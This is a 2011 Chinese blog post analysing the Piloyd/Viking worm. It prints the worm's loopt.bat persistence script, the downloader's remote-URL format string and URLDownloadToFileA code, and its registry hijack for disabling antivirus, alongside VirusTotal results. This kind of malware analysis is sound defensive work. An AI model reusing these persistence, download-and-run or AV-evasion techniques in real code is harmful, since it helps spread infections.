2011年1月17日 星期一

[Analyze] Worm/Piloyd.au / Win32.Viking.AR [無極殺手]

一天網路上收集資料不小心中了這款,

起初啟動Expor.exe,透過Expor.exe,間接隨機生成調用xmlprov.dll,ntmssvc.dll,mspmsnsv.dll,tapisrv.dll,
最後加載驅動並將常規防毒軟體、工具關閉(360),
好奇為什麼殺不太掉,於是看了下,


映像劫持,禁用默認下的防毒軟體工具,
無故加載 Expor.exe, c:\windows\system32\xmlprov.dll ,

找可疑程式、驅動結果找不太到,
後來將xmlprov.dll dump下來看看,


%s%s%d.exe,http://%s/%s/%s.exe,URLDownloadToFile,

URLDownloadToFileA();
不知道去某OO地方下載某些木馬&病毒再次進行感染,

 

C++語法大概像
HINSTANCE hInstance = ::LoadLibrary( "urlmon.dll" );
::GetProcAddress(
hInstance,"URLDownloadToFileA");

類似downloader行為,而前面為下載地址,這裡就帶過,


virus透過reg進行映像劫持
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
並感染exe,htm,html,asp,aspx,rar,


還會生成這隻Rar.exe後執行,並生成dll進行感染,

架構與Expor.exe類似,
if(![Rar.exe])//not exist
{
 create [Rar.exe];
 open [Rar.exe];
}

Rar.exe和Expor.exe差別在於Expor.exe執行後自我刪除,
在調用這塊lsasvc.dll同時除了生成Expor.exe之外,另外生成loopt.bat,

loopt.bat批處理如下

copy /Y "C:\windows\TEMP\Expor.exe" "C:\windows\system32\dllcache\lsasvc.dll"
:runagain
del "C:\windows\TEMP\Expor.exe"
if exist "C:\windows\TEMP\Expor.exe" goto runagain
del "C:\windows\TEMP\Loopt.bat"

Expor.exe copy到lsasvc.dll ,用copy帶Y參數,將其默認複製進去,
執行後再將 loopt.bat Delete,
這就是微軟以外驅動都確認過,為何還是刪不掉的可能問題,
dll看完索性也看下Expor.exe,


EIP:0x00401CA0,OEP:0x00401838,
加了一層殼,dump後IAT修復,PEiD=Microsoft Visual C++ 6.0,

直接丟Virustotal看下有沒收穫,

 
Antivirus Version Last Update Result
AhnLab-V32011.01.16.002011.01.16-
AntiVir7.11.1.1632011.01.17W32/Agent.DP
Antiy-AVL2.0.3.72011.01.17Worm/Win32.Piloyd.gen
Avast4.8.1351.02011.01.17Win32:Viking-CF
Avast55.0.677.02011.01.17Win32:Viking-CF
AVG10.0.0.11902011.01.17Worm/Generic.APDT
BitDefender7.22011.01.17Trojan.Viking.A
CAT-QuickHeal11.002011.01.17I-Worm.Piloyd.p
ClamAV0.96.4.02011.01.17Worm.Piloyd-2
Command5.2.11.52011.01.16W32/Downloader.C.gen!Eldorado
Comodo74202011.01.17TrojWare.Win32.TrojanDownloader.Agent.~EBX
DrWeb5.0.2.033002011.01.17Win32.HLLW.Autoruner.8265
eSafe7.0.17.02011.01.17-
eTrust-Vet36.1.81042011.01.17-
F-Prot4.6.2.1172011.01.16W32/Downloader.C.gen!Eldorado
F-Secure9.0.16160.02011.01.17Trojan.Viking.A
Fortinet4.2.254.02011.01.16W32/Piloyd.M
GData212011.01.17Trojan.Viking.A
IkarusT3.1.1.97.02011.01.17Trojan-Downloader.Win32.Jadtre
Jiangmin13.0.9002011.01.17Worm/Piloyd.e
K7AntiVirus9.77.35652011.01.17Trojan-Downloader
McAfee5.400.0.11582011.01.17W32/Fujacks.worm
McAfee-GW-Edition2010.1C2011.01.17Heuristic.BehavesLike.Win32.Downloader.H
Microsoft1.64022011.01.17TrojanDownloader:Win32/Jadtre.A
NOD3257952011.01.17Win32/AutoRun.AntiAV.Q
Norman6.06.122011.01.17-
nProtect2011-01-17.012011.01.17Worm/W32.Piloyd.81920
Panda10.0.2.72011.01.17W32/Autorun.JLX.worm
PCTools7.0.3.52011.01.17-
Prevx3.02011.01.17Medium Risk Malware
Rising22.83.00.032011.01.17Win32.Agent.hg
Sophos4.61.02011.01.17W32/FuzVir-A
SUPERAntiSpyware4.40.0.10062011.01.17-
Symantec20101.3.0.1032011.01.17-
TheHacker6.7.0.1.1152011.01.14-
TrendMicro9.120.0.10042011.01.17WORM_PILOYD.A
TrendMicro-HouseCall9.120.0.10042011.01.17WORM_PILOYD.A
VBA323.12.14.22011.01.17Net-Worm.Win32.Piloyd.bg
VIPRE81022011.01.17-
ViRobot2011.1.17.42592011.01.17Worm.Win32.Net-Piloyd.81920
VirusBuster13.6.151.02011.01.17-


後來發現uphclean.exe這程式也被感染並加載驅動(已被我關閉),
當下多exe、html等等被感染,正將病毒代碼一一清除,
除了釋放dll,還會感染所有disk達到繁殖保護&反覆感染效果.
最後配合Wsyscheck&360&江民的使用將它們dump下來當標本,
佩服作者的思路,有無驅動保護之下都能順利啟動&過大部分防毒軟體,
也從中學到不少東西

額外學習補充:江民對無極殺手的解釋、DOS的copy指令大全

for 專題樣本之一

最後感謝virus作者,google & you.

沒有留言:

張貼留言